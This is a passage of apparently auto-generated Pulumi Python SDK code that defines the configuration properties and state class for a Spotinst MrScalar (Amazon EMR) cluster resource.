@applications.setter
def applications(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]]):
pulumi.set(self, "applications", value)
@property
@pulumi.getter(name="availabilityZones")
def availability_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of AZs and their subnet Ids. See example above for usage.
"""
return pulumi.get(self, "availability_zones")
@availability_zones.setter
def availability_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "availability_zones", value)
@property
@pulumi.getter(name="bootstrapActionsFiles")
def bootstrap_actions_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]:
"""
Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "bootstrap_actions_files")
@bootstrap_actions_files.setter
def bootstrap_actions_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]]):
pulumi.set(self, "bootstrap_actions_files", value)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler cluster id.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="configurationsFiles")
def configurations_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]:
"""
Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
"""
return pulumi.get(self, "configurations_files")
@configurations_files.setter
def configurations_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]]):
pulumi.set(self, "configurations_files", value)
@property
@pulumi.getter(name="coreDesiredCapacity")
def core_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in core group.
"""
return pulumi.get(self, "core_desired_capacity")
@core_desired_capacity.setter
def core_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_desired_capacity", value)
@property
@pulumi.getter(name="coreEbsBlockDevices")
def core_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your core group instances. Only a single block is allowed.
"""
return pulumi.get(self, "core_ebs_block_devices")
@core_ebs_block_devices.setter
def core_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]]):
pulumi.set(self, "core_ebs_block_devices", value)
@property
@pulumi.getter(name="coreEbsOptimized")
def core_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "core_ebs_optimized")
@core_ebs_optimized.setter
def core_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "core_ebs_optimized", value)
@property
@pulumi.getter(name="coreInstanceTypes")
def core_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the core nodes.
"""
return pulumi.get(self, "core_instance_types")
@core_instance_types.setter
def core_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "core_instance_types", value)
@property
@pulumi.getter(name="coreLifecycle")
def core_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "core_lifecycle")
@core_lifecycle.setter
def core_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_lifecycle", value)
@property
@pulumi.getter(name="coreMaxSize")
def core_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in core group.
"""
return pulumi.get(self, "core_max_size")
@core_max_size.setter
def core_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_max_size", value)
@property
@pulumi.getter(name="coreMinSize")
def core_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in core group.
"""
return pulumi.get(self, "core_min_size")
@core_min_size.setter
def core_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "core_min_size", value)
@property
@pulumi.getter(name="coreScalingDownPolicies")
def core_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_down_policies")
@core_scaling_down_policies.setter
def core_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]]):
pulumi.set(self, "core_scaling_down_policies", value)
@property
@pulumi.getter(name="coreScalingUpPolicies")
def core_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]:
return pulumi.get(self, "core_scaling_up_policies")
@core_scaling_up_policies.setter
def core_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]]):
pulumi.set(self, "core_scaling_up_policies", value)
@property
@pulumi.getter(name="coreUnit")
def core_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "core_unit")
@core_unit.setter
def core_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "core_unit", value)
@property
@pulumi.getter(name="customAmiId")
def custom_ami_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
"""
return pulumi.get(self, "custom_ami_id")
@custom_ami_id.setter
def custom_ami_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_ami_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ebsRootVolumeSize")
def ebs_root_volume_size(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "ebs_root_volume_size")
@ebs_root_volume_size.setter
def ebs_root_volume_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ebs_root_volume_size", value)
@property
@pulumi.getter(name="ec2KeyName")
def ec2_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of an Amazon EC2 key pair that can be used to ssh to the master node.
"""
return pulumi.get(self, "ec2_key_name")
@ec2_key_name.setter
def ec2_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ec2_key_name", value)
@property
@pulumi.getter(name="exposeClusterId")
def expose_cluster_id(self) -> Optional[pulumi.Input[bool]]:
"""
Allow the `cluster_id` to set a provider output variable.
"""
return pulumi.get(self, "expose_cluster_id")
@expose_cluster_id.setter
def expose_cluster_id(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "expose_cluster_id", value)
@property
@pulumi.getter(name="instanceWeights")
def instance_weights(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]:
"""
Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
"""
return pulumi.get(self, "instance_weights")
@instance_weights.setter
def instance_weights(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]]):
pulumi.set(self, "instance_weights", value)
@property
@pulumi.getter(name="jobFlowRole")
def job_flow_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
"""
return pulumi.get(self, "job_flow_role")
@job_flow_role.setter
def job_flow_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "job_flow_role", value)
@property
@pulumi.getter(name="keepJobFlowAlive")
def keep_job_flow_alive(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the cluster should remain available after completing all steps.
"""
return pulumi.get(self, "keep_job_flow_alive")
@keep_job_flow_alive.setter
def keep_job_flow_alive(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "keep_job_flow_alive", value)
@property
@pulumi.getter(name="logUri")
def log_uri(self) -> Optional[pulumi.Input[str]]:
"""
The path to the Amazon S3 location where logs for this cluster are stored.
"""
return pulumi.get(self, "log_uri")
@log_uri.setter
def log_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "log_uri", value)
@property
@pulumi.getter(name="managedPrimarySecurityGroup")
def managed_primary_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the primary instance group.
"""
return pulumi.get(self, "managed_primary_security_group")
@managed_primary_security_group.setter
def managed_primary_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_primary_security_group", value)
@property
@pulumi.getter(name="managedReplicaSecurityGroup")
def managed_replica_security_group(self) -> Optional[pulumi.Input[str]]:
"""
EMR Managed Security group that will be set to the replica instance group.
"""
return pulumi.get(self, "managed_replica_security_group")
@managed_replica_security_group.setter
def managed_replica_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_replica_security_group", value)
@property
@pulumi.getter(name="masterEbsBlockDevices")
def master_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your master group instances. Only a single block is allowed.
"""
return pulumi.get(self, "master_ebs_block_devices")
@master_ebs_block_devices.setter
def master_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]]):
pulumi.set(self, "master_ebs_block_devices", value)
@property
@pulumi.getter(name="masterEbsOptimized")
def master_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "master_ebs_optimized")
@master_ebs_optimized.setter
def master_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "master_ebs_optimized", value)
@property
@pulumi.getter(name="masterInstanceTypes")
def master_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the master nodes.
"""
return pulumi.get(self, "master_instance_types")
@master_instance_types.setter
def master_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "master_instance_types", value)
@property
@pulumi.getter(name="masterLifecycle")
def master_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "master_lifecycle")
@master_lifecycle.setter
def master_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_lifecycle", value)
@property
@pulumi.getter(name="masterTarget")
def master_target(self) -> Optional[pulumi.Input[int]]:
"""
Number of instances in the master group.
"""
return pulumi.get(self, "master_target")
@master_target.setter
def master_target(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "master_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The application name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="provisioningTimeout")
def provisioning_timeout(self) -> Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]:
return pulumi.get(self, "provisioning_timeout")
@provisioning_timeout.setter
def provisioning_timeout(self, value: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']]):
pulumi.set(self, "provisioning_timeout", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler region.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="releaseLabel")
def release_label(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "release_label")
@release_label.setter
def release_label(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "release_label", value)
@property
@pulumi.getter(name="repoUpgradeOnBoot")
def repo_upgrade_on_boot(self) -> Optional[pulumi.Input[str]]:
"""
Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
"""
return pulumi.get(self, "repo_upgrade_on_boot")
@repo_upgrade_on_boot.setter
def repo_upgrade_on_boot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "repo_upgrade_on_boot", value)
@property
@pulumi.getter
def retries(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
"""
return pulumi.get(self, "retries")
@retries.setter
def retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "retries", value)
@property
@pulumi.getter(name="scheduledTasks")
def scheduled_tasks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]:
"""
An array of scheduled tasks.
"""
return pulumi.get(self, "scheduled_tasks")
@scheduled_tasks.setter
def scheduled_tasks(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]]):
pulumi.set(self, "scheduled_tasks", value)
@property
@pulumi.getter(name="securityConfig")
def security_config(self) -> Optional[pulumi.Input[str]]:
"""
The name of the security configuration applied to the cluster.
"""
return pulumi.get(self, "security_config")
@security_config.setter
def security_config(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "security_config", value)
@property
@pulumi.getter(name="serviceAccessSecurityGroup")
def service_access_security_group(self) -> Optional[pulumi.Input[str]]:
"""
The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
"""
return pulumi.get(self, "service_access_security_group")
@service_access_security_group.setter
def service_access_security_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_access_security_group", value)
@property
@pulumi.getter(name="serviceRole")
def service_role(self) -> Optional[pulumi.Input[str]]:
"""
The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
"""
return pulumi.get(self, "service_role")
@service_role.setter
def service_role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "service_role", value)
@property
@pulumi.getter(name="stepsFiles")
def steps_files(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]:
"""
Steps from S3.
"""
return pulumi.get(self, "steps_files")
@steps_files.setter
def steps_files(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]]):
pulumi.set(self, "steps_files", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]:
"""
A list of tags to assign to the resource. You may define multiple tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="taskDesiredCapacity")
def task_desired_capacity(self) -> Optional[pulumi.Input[int]]:
"""
amount of instances in task group.
"""
return pulumi.get(self, "task_desired_capacity")
@task_desired_capacity.setter
def task_desired_capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_desired_capacity", value)
@property
@pulumi.getter(name="taskEbsBlockDevices")
def task_ebs_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]:
"""
This determines the ebs configuration for your task group instances. Only a single block is allowed.
"""
return pulumi.get(self, "task_ebs_block_devices")
@task_ebs_block_devices.setter
def task_ebs_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]]):
pulumi.set(self, "task_ebs_block_devices", value)
@property
@pulumi.getter(name="taskEbsOptimized")
def task_ebs_optimized(self) -> Optional[pulumi.Input[bool]]:
"""
EBS Optimization setting for instances in group.
"""
return pulumi.get(self, "task_ebs_optimized")
@task_ebs_optimized.setter
def task_ebs_optimized(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "task_ebs_optimized", value)
@property
@pulumi.getter(name="taskInstanceTypes")
def task_instance_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The MrScaler instance types for the task nodes.
"""
return pulumi.get(self, "task_instance_types")
@task_instance_types.setter
def task_instance_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "task_instance_types", value)
@property
@pulumi.getter(name="taskLifecycle")
def task_lifecycle(self) -> Optional[pulumi.Input[str]]:
"""
The MrScaler lifecycle for instances in task group. Allowed values are 'SPOT' and 'ON_DEMAND'.
"""
return pulumi.get(self, "task_lifecycle")
@task_lifecycle.setter
def task_lifecycle(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_lifecycle", value)
@property
@pulumi.getter(name="taskMaxSize")
def task_max_size(self) -> Optional[pulumi.Input[int]]:
"""
maximal amount of instances in task group.
"""
return pulumi.get(self, "task_max_size")
@task_max_size.setter
def task_max_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_max_size", value)
@property
@pulumi.getter(name="taskMinSize")
def task_min_size(self) -> Optional[pulumi.Input[int]]:
"""
The minimal amount of instances in task group.
"""
return pulumi.get(self, "task_min_size")
@task_min_size.setter
def task_min_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "task_min_size", value)
@property
@pulumi.getter(name="taskScalingDownPolicies")
def task_scaling_down_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_down_policies")
@task_scaling_down_policies.setter
def task_scaling_down_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]]):
pulumi.set(self, "task_scaling_down_policies", value)
@property
@pulumi.getter(name="taskScalingUpPolicies")
def task_scaling_up_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]:
return pulumi.get(self, "task_scaling_up_policies")
@task_scaling_up_policies.setter
def task_scaling_up_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]]):
pulumi.set(self, "task_scaling_up_policies", value)
@property
@pulumi.getter(name="taskUnit")
def task_unit(self) -> Optional[pulumi.Input[str]]:
"""
Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
"""
return pulumi.get(self, "task_unit")
@task_unit.setter
def task_unit(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "task_unit", value)
@property
@pulumi.getter(name="terminationPolicies")
def termination_policies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]:
"""
Allows defining termination policies for EMR clusters based on CloudWatch Metrics.
"""
return pulumi.get(self, "termination_policies")
@termination_policies.setter
def termination_policies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]]):
pulumi.set(self, "termination_policies", value)
@property
@pulumi.getter(name="terminationProtected")
def termination_protected(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the Amazon EC2 instances in the cluster are protected from termination by API calls, user intervention, or in the event of a job-flow error.
"""
return pulumi.get(self, "termination_protected")
@termination_protected.setter
def termination_protected(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "termination_protected", value)
@property
@pulumi.getter(name="visibleToAllUsers")
def visible_to_all_users(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "visible_to_all_users")
@visible_to_all_users.setter
def visible_to_all_users(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "visible_to_all_users", value)
@pulumi.input_type
class _MrScalarState:
    def __init__(__self__, *,
                 additional_info: Optional[pulumi.Input[str]] = None,
                 additional_primary_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 additional_replica_security_groups: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 applications: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]]] = None,
                 availability_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 bootstrap_actions_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]]] = None,
                 cluster_id: Optional[pulumi.Input[str]] = None,
                 configurations_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]]] = None,
                 core_desired_capacity: Optional[pulumi.Input[int]] = None,
                 core_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]]] = None,
                 core_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                 core_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 core_lifecycle: Optional[pulumi.Input[str]] = None,
                 core_max_size: Optional[pulumi.Input[int]] = None,
                 core_min_size: Optional[pulumi.Input[int]] = None,
                 core_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingDownPolicyArgs']]]] = None,
                 core_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarCoreScalingUpPolicyArgs']]]] = None,
                 core_unit: Optional[pulumi.Input[str]] = None,
                 custom_ami_id: Optional[pulumi.Input[str]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 ebs_root_volume_size: Optional[pulumi.Input[int]] = None,
                 ec2_key_name: Optional[pulumi.Input[str]] = None,
                 expose_cluster_id: Optional[pulumi.Input[bool]] = None,
                 instance_weights: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]]] = None,
                 job_flow_role: Optional[pulumi.Input[str]] = None,
                 keep_job_flow_alive: Optional[pulumi.Input[bool]] = None,
                 log_uri: Optional[pulumi.Input[str]] = None,
                 managed_primary_security_group: Optional[pulumi.Input[str]] = None,
                 managed_replica_security_group: Optional[pulumi.Input[str]] = None,
                 master_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]]] = None,
                 master_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                 master_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 master_lifecycle: Optional[pulumi.Input[str]] = None,
                 master_target: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 output_cluster_id: Optional[pulumi.Input[str]] = None,
                 provisioning_timeout: Optional[pulumi.Input['MrScalarProvisioningTimeoutArgs']] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 release_label: Optional[pulumi.Input[str]] = None,
                 repo_upgrade_on_boot: Optional[pulumi.Input[str]] = None,
                 retries: Optional[pulumi.Input[int]] = None,
                 scheduled_tasks: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]]] = None,
                 security_config: Optional[pulumi.Input[str]] = None,
                 service_access_security_group: Optional[pulumi.Input[str]] = None,
                 service_role: Optional[pulumi.Input[str]] = None,
                 steps_files: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]]] = None,
                 strategy: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]]] = None,
                 task_desired_capacity: Optional[pulumi.Input[int]] = None,
                 task_ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskEbsBlockDeviceArgs']]]] = None,
                 task_ebs_optimized: Optional[pulumi.Input[bool]] = None,
                 task_instance_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 task_lifecycle: Optional[pulumi.Input[str]] = None,
                 task_max_size: Optional[pulumi.Input[int]] = None,
                 task_min_size: Optional[pulumi.Input[int]] = None,
                 task_scaling_down_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingDownPolicyArgs']]]] = None,
                 task_scaling_up_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTaskScalingUpPolicyArgs']]]] = None,
                 task_unit: Optional[pulumi.Input[str]] = None,
                 termination_policies: Optional[pulumi.Input[Sequence[pulumi.Input['MrScalarTerminationPolicyArgs']]]] = None,
                 termination_protected: Optional[pulumi.Input[bool]] = None,
                 visible_to_all_users: Optional[pulumi.Input[bool]] = None):
        """
        Input properties used for looking up and filtering MrScalar resources.
        :param pulumi.Input[str] additional_info: This is meta information about third-party applications that third-party vendors use for testing purposes.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_primary_security_groups: A list of additional Amazon EC2 security group IDs for the master node.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] additional_replica_security_groups: A list of additional Amazon EC2 security group IDs for the core and task nodes.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarApplicationArgs']]] applications: A case-insensitive list of applications for Amazon EMR to install and configure when launching the cluster
        :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zones: List of AZs and their subnet Ids. See example above for usage.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarBootstrapActionsFileArgs']]] bootstrap_actions_files: Describes path to S3 file containing description of bootstrap actions. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[str] cluster_id: The MrScaler cluster id.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarConfigurationsFileArgs']]] configurations_files: Describes path to S3 file containing description of configurations. [More Information](https://api.spotinst.com/elastigroup-for-aws/services-integrations/elastic-mapreduce/import-an-emr-cluster/advanced/)
        :param pulumi.Input[int] core_desired_capacity: amount of instances in core group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarCoreEbsBlockDeviceArgs']]] core_ebs_block_devices: This determines the ebs configuration for your core group instances. Only a single block is allowed.
        :param pulumi.Input[bool] core_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] core_instance_types: The MrScaler instance types for the core nodes.
        :param pulumi.Input[str] core_lifecycle: The MrScaler lifecycle for instances in core group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] core_max_size: maximal amount of instances in core group.
        :param pulumi.Input[int] core_min_size: The minimal amount of instances in core group.
        :param pulumi.Input[str] core_unit: Unit of task group for target, min and max. The unit could be `instance` or `weight`. instance - amount of instances. weight - amount of vCPU.
        :param pulumi.Input[str] custom_ami_id: The ID of a custom Amazon EBS-backed Linux AMI if the cluster uses a custom AMI.
        :param pulumi.Input[str] description: The MrScaler description.
        :param pulumi.Input[str] ec2_key_name: The name of an Amazon EC2 key pair that can be used to ssh to the master node.
        :param pulumi.Input[bool] expose_cluster_id: Allow the `cluster_id` to set a provider output variable.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarInstanceWeightArgs']]] instance_weights: Describes the instance and weights. Check out [Elastigroup Weighted Instances](https://api.spotinst.com/elastigroup-for-aws/concepts/general-concepts/elastigroup-capacity-instances-or-weighted) for more info.
        :param pulumi.Input[str] job_flow_role: The IAM role that was specified when the job flow was launched. The EC2 instances of the job flow assume this role.
        :param pulumi.Input[bool] keep_job_flow_alive: Specifies whether the cluster should remain available after completing all steps.
        :param pulumi.Input[str] log_uri: The path to the Amazon S3 location where logs for this cluster are stored.
        :param pulumi.Input[str] managed_primary_security_group: EMR Managed Security group that will be set to the primary instance group.
        :param pulumi.Input[str] managed_replica_security_group: EMR Managed Security group that will be set to the replica instance group.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarMasterEbsBlockDeviceArgs']]] master_ebs_block_devices: This determines the ebs configuration for your master group instances. Only a single block is allowed.
        :param pulumi.Input[bool] master_ebs_optimized: EBS Optimization setting for instances in group.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] master_instance_types: The MrScaler instance types for the master nodes.
        :param pulumi.Input[str] master_lifecycle: The MrScaler lifecycle for instances in master group. Allowed values are 'SPOT' and 'ON_DEMAND'.
        :param pulumi.Input[int] master_target: Number of instances in the master group.
        :param pulumi.Input[str] name: The application name.
        :param pulumi.Input[str] region: The MrScaler region.
        :param pulumi.Input[str] repo_upgrade_on_boot: Applies only when `custom_ami_id` is used. Specifies the type of updates that are applied from the Amazon Linux AMI package repositories when an instance boots using the AMI. Possible values include: `SECURITY`, `NONE`.
        :param pulumi.Input[int] retries: Specifies the maximum number of times a capacity provisioning should be retried if the provisioning timeout is exceeded. Valid values: `1-5`.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarScheduledTaskArgs']]] scheduled_tasks: An array of scheduled tasks.
        :param pulumi.Input[str] security_config: The name of the security configuration applied to the cluster.
        :param pulumi.Input[str] service_access_security_group: The identifier of the Amazon EC2 security group for the Amazon EMR service to access clusters in VPC private subnets.
        :param pulumi.Input[str] service_role: The IAM role that will be assumed by the Amazon EMR service to access AWS resources on your behalf.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarStepsFileArgs']]] steps_files: Steps from S3.
        :param pulumi.Input[str] strategy: The MrScaler strategy. Allowed values are `new` `clone` and `wrap`.
        :param pulumi.Input[Sequence[pulumi.Input['MrScalarTagArgs']]] tags: A list of tags to assign to the resource. You may define multiple tags.
        :param pulumi.Input[int] task_desired_capacity: amount of instances in task group.
